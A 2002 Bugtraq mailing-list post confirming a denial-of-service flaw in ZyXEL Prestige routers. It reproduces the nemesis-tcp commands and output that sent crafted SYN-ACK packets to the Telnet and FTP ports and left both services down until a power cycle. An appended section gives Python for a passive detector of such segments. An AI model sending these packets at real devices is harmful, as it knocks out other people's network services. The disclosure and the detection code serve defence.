[25931] in bugtraq
RE: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS
daemon@ATHENA.MIT.EDU (Christopher Gripp)
Tue Jun 25 08:07:31 2002
Date: Mon, 24 Jun 2002 10:11:15 -0700
Message-ID: <4EBB5C35607E7F48B4AE162D956666EFF6EFAB@guam.corp.axcelerant.com>
From: "Christopher Gripp" <cgripp@axcelerant.com>
To: "Bugtraq" <Bugtraq@securityfocus.com>

I have verified this same DoS attack is viable on a Prestige 310 running an OEM version of code written specifically for my company. I successfully DoS'd both the FTP and Telnet services. Below are the nemesis commands used. The services remained in an unreachable state until a power cycle was performed.

[root@mybox root]# nemesis-tcp -v -fS -fA -S [SRC IP] -D [DST IP] -y 23
TCP Packet Injection -=- The NEMESIS Project 1.32
Copyright (C) 1999, 2000, 2001 Mark Grimes <obecian@packetninja.net>
Portions copyright (C) 2001 Jeff Nathan <jeff@wwti.com>
[IP] [SRC IP] > [DST IP]
[Ports] 42069 > 23
[Flags] SYN ACK
[TCP Urgent Pointer] 2048
[Window Size] 512
[ACK number] 420
[Sequence number] 420
[IP ID] 0
[IP TTL] 254
[IP TOS] 0x18
[IP Frag] 0x4000
[IP Options]
Wrote 40 bytes
TCP Packet Injected

[root@mybox root]# nemesis-tcp -v -fS -fA -S [SRC IP] -D [DST IP] -y 21
TCP Packet Injection -=- The NEMESIS Project 1.32
Copyright (C) 1999, 2000, 2001 Mark Grimes <obecian@packetninja.net>
Portions copyright (C) 2001 Jeff Nathan <jeff@wwti.com>
[IP] [SRC IP] > [DST IP]
[Ports] 42069 > 21
[Flags] SYN ACK
[TCP Urgent Pointer] 2048
[Window Size] 512
[ACK number] 420
[Sequence number] 420
[IP ID] 0
[IP TTL] 254
[IP TOS] 0x18
[IP Frag] 0x4000
[IP Options]
Wrote 40 bytes
TCP Packet Injected

Christopher Gripp
Systems Engineer
Axcelerant
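
Added example, not part of the original post or of any vendor code: a passive check a sensor in front of such a device could run to flag the segment types named in the subject line (SYN-FIN, and SYN-ACK that answers no SYN the device sent) when they arrive on the FTP and Telnet ports. The names `HandshakeMonitor` and `sample`, the documentation-range addresses, and the assumption that the sensor sees traffic in both directions are illustrative choices made here.

```python
import socket
import struct

FIN, SYN, ACK = 0x01, 0x02, 0x10
WATCHED_PORTS = {21, 23}  # FTP and Telnet, the two services named in the post

def parse_ipv4_tcp(pkt):
    """Return (src, dst, sport, dport, flags) for an IPv4/TCP packet, else None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4 or pkt[9] != 6:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    frag_offset = struct.unpack("!H", pkt[6:8])[0] & 0x1FFF
    if ihl < 20 or frag_offset or len(pkt) < ihl + 20:
        return None  # malformed, or a later fragment with no TCP header
    sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
    return (socket.inet_ntoa(pkt[12:16]), socket.inet_ntoa(pkt[16:20]),
            sport, dport, pkt[ihl + 13])

class HandshakeMonitor:
    """Flags SYN-FIN and unmatched SYN-ACK segments aimed at a protected host."""
    def __init__(self, protected):
        self.protected = set(protected)
        self.pending = set()  # (local, lport, remote, rport) with a SYN in flight

    def inspect(self, pkt):
        parsed = parse_ipv4_tcp(pkt)
        if parsed is None:
            return None
        src, dst, sport, dport, flags = parsed
        if src in self.protected and (flags & (SYN | ACK)) == SYN:
            self.pending.add((src, sport, dst, dport))  # our own outbound SYN
            return None
        if dst not in self.protected or dport not in WATCHED_PORTS:
            return None
        if flags & SYN and flags & FIN:
            return f"SYN-FIN {src}:{sport} -> {dst}:{dport}"
        if (flags & (SYN | ACK)) == (SYN | ACK) and \
                (dst, dport, src, sport) not in self.pending:
            return f"unsolicited SYN-ACK {src}:{sport} -> {dst}:{dport}"
        return None

def sample(src, dst, sport, dport, flags):
    """Constructed test input: bare 40-byte IPv4+TCP headers, checksums zeroed."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0x4000, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, flags, 512, 0, 0)

if __name__ == "__main__":
    mon = HandshakeMonitor({"192.0.2.1"})  # documentation-range address
    for f in (SYN | ACK, SYN | FIN, SYN):
        print(mon.inspect(sample("198.51.100.7", "192.0.2.1", 42069, 23, f)))
```

An ordinary inbound SYN to a watched port is not reported, and a SYN-ACK is only reported when no matching outbound SYN from the protected address was seen first.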